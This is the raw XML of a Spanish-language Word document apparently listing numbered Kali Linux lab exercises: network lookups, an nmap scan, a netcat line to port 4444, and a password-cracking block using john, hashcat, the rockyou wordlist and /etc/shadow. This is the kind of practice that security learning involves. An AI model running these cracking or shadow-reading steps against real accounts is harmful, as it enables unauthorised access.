    <w:p w14:paraId="7D3DC9B0" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C37146D" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2707BD9C" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35C712AB" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D9087D9" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C8F1C92" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00389F10" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4541F5AA" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFEB884" w14:textId="173AC91C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30. Ver ruta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F96915" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>traceroute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5480B564" w14:textId="54134A57" w:rsidR="002A7F2B" w:rsidRPr="00206562" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:r w:rsidRPr="002A7F2B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0317BE08" wp14:editId="13BE943E">
            <wp:extent cx="6840220" cy="2717165"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="77372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6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F41" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA402D2" w14:textId="44EED115" w:rsidR="002A7F2B" w:rsidRPr="00206562" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:r w:rsidRPr="002A7F2B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18D7FE27" wp14:editId="5EBFAE04">
            <wp:extent cx="6840220" cy="1998345"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="2078667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7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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>route</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="545AEB9D" w14:textId="259D254D" w:rsidR="002A7F2B" w:rsidRPr="00206562" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:r w:rsidRPr="002A7F2B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18ACCE85" wp14:editId="387B8C19">
            <wp:extent cx="6582694" cy="724001"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="964539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39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7BEA5D6E" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AEE41CC" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60FEFC77" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0D379B" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E7B4399" w14:textId="31283886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33. DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DD27CA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</w:p>
    <w:p w14:paraId="5577C56D" w14:textId="73FA2D73" w:rsidR="002A7F2B" w:rsidRPr="00206562" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:r w:rsidRPr="002A7F2B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FAE85D8" wp14:editId="45518D0E">
            <wp:extent cx="6296904" cy="1133633"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="210935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512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77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nslookup google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22033274" w14:textId="4715B448" w:rsidR="006A61E5" w:rsidRDefault="006A61E5" w:rsidP="00206562">
      <w:r w:rsidRPr="006A61E5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26B1F6C3" wp14:editId="1454710E">
            <wp:extent cx="3048425" cy="4153480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="94728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898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4188" w14:textId="77777777" w:rsidR="006A61E5" w:rsidRPr="00206562" w:rsidRDefault="006A61E5" w:rsidP="00206562"/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622BA517" w14:textId="77777777" w:rsidR="006A61E5" w:rsidRDefault="006A61E5" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43FB91B9" w14:textId="77777777" w:rsidR="006A61E5" w:rsidRDefault="006A61E5" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A5B8BB" w14:textId="77777777" w:rsidR="006A61E5" w:rsidRDefault="006A61E5" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32AEB426" w14:textId="77777777" w:rsidR="006A61E5" w:rsidRDefault="006A61E5" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D2C747" w14:textId="77777777" w:rsidR="006A61E5" w:rsidRDefault="006A61E5" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB8B41B" w14:textId="77777777" w:rsidR="006A61E5" w:rsidRDefault="006A61E5" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5512CA4E" w14:textId="77777777" w:rsidR="006A61E5" w:rsidRDefault="006A61E5" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24BF1A4C" w14:textId="31E26393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35. Alternativa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52609419" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>dig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6D2A02" w14:textId="5C32BB32" w:rsidR="006A61E5" w:rsidRPr="00206562" w:rsidRDefault="006A61E5" w:rsidP="00206562">
      <w:r w:rsidRPr="006A61E5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21446401" wp14:editId="57BD30FC">
            <wp:extent cx="5449060" cy="4048690"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1414973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3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471D26D6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399E6793" w14:textId="0745E370" w:rsidR="006A61E5" w:rsidRPr="00206562" w:rsidRDefault="006A61E5" w:rsidP="00206562">
      <w:r w:rsidRPr="006A61E5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F32F304" wp14:editId="00A1A431">
            <wp:extent cx="2333951" cy="685896"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="177975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43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BEE7" w14:textId="1478D1A0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192.168.1.1 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11198317" w14:textId="3714DB5A" w:rsidR="009B6754" w:rsidRPr="00206562" w:rsidRDefault="009B6754" w:rsidP="00206562">
      <w:r w:rsidRPr="009B6754">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="362FF006" wp14:editId="6817F855">
            <wp:extent cx="4496427" cy="762106"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1501577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79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73A57C2D" w14:textId="77777777" w:rsidR="009B6754" w:rsidRDefault="009B6754" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5E3C02" w14:textId="77777777" w:rsidR="009B6754" w:rsidRDefault="009B6754" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E3E1D34" w14:textId="77777777" w:rsidR="009B6754" w:rsidRDefault="009B6754" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D59A5AF" w14:textId="77777777" w:rsidR="009B6754" w:rsidRDefault="009B6754" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00697F8C" w14:textId="6FF3218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38. Transferir archivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4EBE4D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</w:p>
    <w:p w14:paraId="1C85D840" w14:textId="784C9549" w:rsidR="009B6754" w:rsidRPr="00206562" w:rsidRDefault="009B6754" w:rsidP="00206562">
      <w:r w:rsidRPr="009B6754">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D081C23" wp14:editId="2B2C460E">
            <wp:extent cx="2724530" cy="895475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="161902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</w:p>
    <w:p w14:paraId="4B94D5F2" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4BEDB4" w14:textId="539C05E4" w:rsidR="009B6754" w:rsidRPr="00206562" w:rsidRDefault="009B6754" w:rsidP="00206562">
      <w:r w:rsidRPr="009B6754">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="239AE029" wp14:editId="079640B1">
            <wp:extent cx="4544059" cy="895475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1238784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4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7E10D0B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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> --host-timeout 30s 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C3EF4A" w14:textId="7609C538" w:rsidR="009B6754" w:rsidRPr="00206562" w:rsidRDefault="009B6754" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B6754">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FDFE5A9" wp14:editId="7B7A6905">
            <wp:extent cx="5249008" cy="2476846"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="202312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2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A2F7" w14:textId="5D63AA4F" w:rsidR="00027F1E" w:rsidRPr="00027F1E" w:rsidRDefault="00000000" w:rsidP="00027F1E">
      <w:r>
        <w:pict w14:anchorId="15A285E8">
          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A94010" w14:textId="77777777" w:rsidR="00027F1E" w:rsidRDefault="00027F1E" w:rsidP="00206562">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07F01B88" w14:textId="77777777" w:rsidR="00027F1E" w:rsidRDefault="00027F1E" w:rsidP="00027F1E"/>
    <w:p w14:paraId="011B43BF" w14:textId="77777777" w:rsidR="00027F1E" w:rsidRDefault="00027F1E" w:rsidP="00027F1E"/>
    <w:p w14:paraId="17861199" w14:textId="77777777" w:rsidR="00027F1E" w:rsidRDefault="00027F1E" w:rsidP="00027F1E"/>
    <w:p w14:paraId="658F9656" w14:textId="77777777" w:rsidR="00027F1E" w:rsidRPr="00027F1E" w:rsidRDefault="00027F1E" w:rsidP="00027F1E"/>
    <w:p w14:paraId="2BCBA721" w14:textId="5E2F24F2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🔓</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> BLOQUE 3: CRACKING Y PASSWORDS (41–60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C5B6B5" w14:textId="538987E4" w:rsidR="00027F1E" w:rsidRPr="00027F1E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6FEE086A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78E274AF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</w:p>
    <w:p w14:paraId="1943004E" w14:textId="77302D37" w:rsidR="00027F1E" w:rsidRPr="00206562" w:rsidRDefault="00027F1E" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00027F1E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E439C95" wp14:editId="494B1826">
            <wp:extent cx="6840220" cy="1936750"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="54371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70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64BF" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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0E6290F4" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>john</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> --show hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661F32B1" w14:textId="188540FF" w:rsidR="00027F1E" w:rsidRPr="00206562" w:rsidRDefault="00027F1E" w:rsidP="00206562">
      <w:r w:rsidRPr="00027F1E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B1B33C7" wp14:editId="6D9E3B86">
            <wp:extent cx="2810267" cy="1038370"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="9797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1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B7E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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</w:p>
    <w:p w14:paraId="556D0C77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5A65A6C3" w14:textId="011E8EAF" w:rsidR="00B634D0" w:rsidRPr="00206562" w:rsidRDefault="00B634D0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0C548514" wp14:editId="622953E5">
            <wp:extent cx="6840220" cy="2268855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="205566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8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F31" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="6CF646D1">
          <v:rect id="_x0000_i1070" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D295020" w14:textId="77777777" w:rsidR="00B634D0" w:rsidRDefault="00B634D0" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BDD5367" w14:textId="77777777" w:rsidR="00B634D0" w:rsidRDefault="00B634D0" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C479C1A" w14:textId="34F3E678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>44. D</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>escomprimir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323C47FF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gunzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> rockyou.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4587E358" w14:textId="67ACFBC6" w:rsidR="00EA5D61" w:rsidRPr="00206562" w:rsidRDefault="00EA5D61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7243C3FA" wp14:editId="7F8FC99F">
            <wp:extent cx="6840220" cy="1329690"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1216125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53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BE1A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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CEFCC86" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:bookmarkStart w:id="0" w:name="_Hlk224727757"/>
      <w:r w:rsidRPr="00206562">
        <w:t>echo -n "1234" | md5sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E988D0F" w14:textId="5EB04DB1" w:rsidR="00B679BB" w:rsidRPr="00206562" w:rsidRDefault="00B679BB" w:rsidP="00206562">
      <w:r w:rsidRPr="00B679BB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CA16355" wp14:editId="466C7A29">
            <wp:extent cx="3162741" cy="609685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="187095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580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6860593" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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0EEAB385" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>echo -n "1234" | sha256sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040276E8" w14:textId="7606203A" w:rsidR="00B679BB" w:rsidRPr="00206562" w:rsidRDefault="00B679BB" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="640F4AE7" wp14:editId="39B9673F">
            <wp:extent cx="5448300" cy="504825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="43092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99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AE4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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</w:p>
    <w:p w14:paraId="267C8833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hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m 0 hash.txt rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FFBEBA" w14:textId="5FEEF630" w:rsidR="00B679BB" w:rsidRPr="00206562" w:rsidRDefault="00B679BB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D678466" wp14:editId="2A39C8A3">
            <wp:extent cx="6840220" cy="4965700"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="47203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8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53F" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="75420A2E">
          <v:rect id="_x0000_i1074" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4457C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4E79E53" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>hashid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26352B14" w14:textId="580E8840" w:rsidR="00B679BB" w:rsidRPr="00206562" w:rsidRDefault="00B679BB" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="408DEDD8" wp14:editId="1FEA5535">
            <wp:extent cx="4362450" cy="2352675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="164185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82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865" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="018D7981">
          <v:rect id="_x0000_i1075" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E32436" w14:textId="77777777" w:rsidR="00B679BB" w:rsidRDefault="00B679BB" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C13BC9" w14:textId="77777777" w:rsidR="00B679BB" w:rsidRDefault="00B679BB" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="630E0703" w14:textId="77777777" w:rsidR="00B679BB" w:rsidRDefault="00B679BB" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="676494E7" w14:textId="3A1F6FBA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 xml:space="preserve">49. Crear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r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B1566F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useradd</w:t>
      </w:r>
      <w:proofErr w:type="spell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  <w:t>passwd test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B23833" w14:textId="43016340" w:rsidR="00B679BB" w:rsidRPr="00206562" w:rsidRDefault="00B679BB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27496073" wp14:editId="4505D938">
            <wp:extent cx="3562350" cy="2286000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="104376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49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51B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2B7B07D5">
          <v:rect id="_x0000_i1076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC3F34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50. Ver hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37587E93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/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D7988F" w14:textId="5872872B" w:rsidR="0061567B" w:rsidRPr="00206562" w:rsidRDefault="0061567B" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CB868D1" wp14:editId="6C7909C1">
            <wp:extent cx="1898374" cy="5743977"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="32493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98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1524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571" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/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 xml:space="preserve">(Si quieres, te desarrollo estos con herramientas concretas tipo Hydra,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000000" w:rsidP="00206562">
      <w:r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61. Ver logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DED2E13" w14:textId="77777777" w:rsidR="0061567B" w:rsidRPr="0061567B" w:rsidRDefault="0061567B" w:rsidP="0061567B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0061567B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>  Kali</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0061567B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> usa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0061567B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>systemd-journald</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0061567B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, no archivos de texto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0D4D8A" w14:textId="77777777" w:rsidR="0061567B" w:rsidRPr="0061567B" w:rsidRDefault="0061567B" w:rsidP="0061567B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0061567B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>  Debes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0061567B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> usar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0061567B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>journalctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0061567B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> para ver los logs.</w:t>
      </w:r>
    </w:p>
